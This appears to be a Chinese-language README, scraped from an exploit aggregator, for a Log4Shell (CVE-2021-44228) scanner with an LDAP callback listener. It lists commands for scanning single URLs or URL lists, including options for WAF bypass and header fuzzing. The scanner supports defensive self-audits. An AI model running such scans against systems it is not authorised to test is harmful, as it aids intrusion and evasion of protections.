Exploit for Uncontrolled Resource Consumption in Apache Log4J

## https://sploitus.com/exploit?id=4096BFF5-03AE-5DA0-8AD6-85D69E2570C1
## 概述

log4j2 RCE漏洞（CVE-2021-44228)内网扫描器，可用于在不出网的条件下进行漏洞扫描，帮助企业内部快速发现Log4jShell漏洞。

修改自: https://github.com/fullhunt/log4j-scan

JNDIMonitor来自：[r00tSe7en/JNDIMonitor: 一个LDAP请求监听器，摆脱dnslog平台 (github.com)](https://github.com/r00tSe7en/JNDIMonitor)



**本工具仅供学习研究自查使用，切勿用于非法用途，由使用该工具产生的一切风险均与本人无关！**



## 使用

JNDIMonitor-2.0.1-SNAPSHOT.jar 和 log4j-scan.py必须放在同一目录下

### 1、开启ldap服务监听

可以公网启（扫互联网），也可以本地启（扫内网）

```
java -jar JNDIMonitor-2.0.1-SNAPSHOT.jar -i 192.168.1.11
```

![image-20211220213754609](README.assets/image-20211220213754609.png)

![image-20211220213811878](README.assets/image-20211220213811878.png)

![image-20211220212445459](README.assets/image-20211220212445459.png)

### 2、启动log4j-scan.py进行扫描

#### 2.0

```
pip3 install -r requirements.txt
```

#### 2.1扫描单个URL (get 、header方式)

```
python3 log4j-scan.py -u http://192.168.111.129:8080/webstudy/hello-fengxuan --ldap-addr 192.168.1.11:1389
```

#### ⭐2.2扫描单个URL（ GET, POST (url-encoded form), POST (JSON body),HEADER方式）

```
python3 log4j-scan.py -u http://192.168.111.129:8080/webstudy/hello-fengxuan --ldap-addr 192.168.1.11:1389 --run-all-tests
```

![image-20211220213837665](README.assets/image-20211220213837665.png)

![image-20211220213902077](README.assets/image-20211220213902077.png)

### 2.3 bypass waf

```
python3 log4j-scan.py -u http://192.168.111.129:8080/webstudy/hello-fengxuan --ldap-addr 192.168.1.11:1389 --run-all-tests --waf-bypass
```

### 2.4 扫描URL列表

```
python3 log4j-scan.py -l urls.txt --ldap-addr 192.168.1.11:1389 --run-all-tests 

python3 log4j-scan.py -l urls.txt --ldap-addr 192.168.1.11:1389 --run-all-tests --waf-bypass
```

### 2.5 所有可选参数

```
python3 log4j-scan.py -h
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
usage: log4j-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--request-type REQUEST_TYPE]
                     [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
                     [--wait-time WAIT_TIME] [--waf-bypass] [--test-CVE-2021-45046]
                     [--ldap-addr CUSTOM_DNS_CALLBACK_ADDR] [--disable-http-redirects]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -p PROXY, --proxy PROXY
                        send requests through proxy
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  --request-type REQUEST_TYPE
                        Request Type: (get, post) - [Default: get].
  --headers-file HEADERS_FILE
                        Headers fuzzing list - [default: headers.txt].
  --run-all-tests       Run all available tests on each URL.
  --exclude-user-agent-fuzzing
                        Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.
  --wait-time WAIT_TIME
                        Wait time after all URLs are processed (in seconds) - [Default: 5].
  --waf-bypass          Extend scans with WAF bypass payloads.
  --test-CVE-2021-45046
                        Test using payloads for CVE-2021-45046 (detection payloads).
  --ldap-addr CUSTOM_DNS_CALLBACK_ADDR
                        Custom DNS Callback Address.
  --disable-http-redirects
                        Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.
```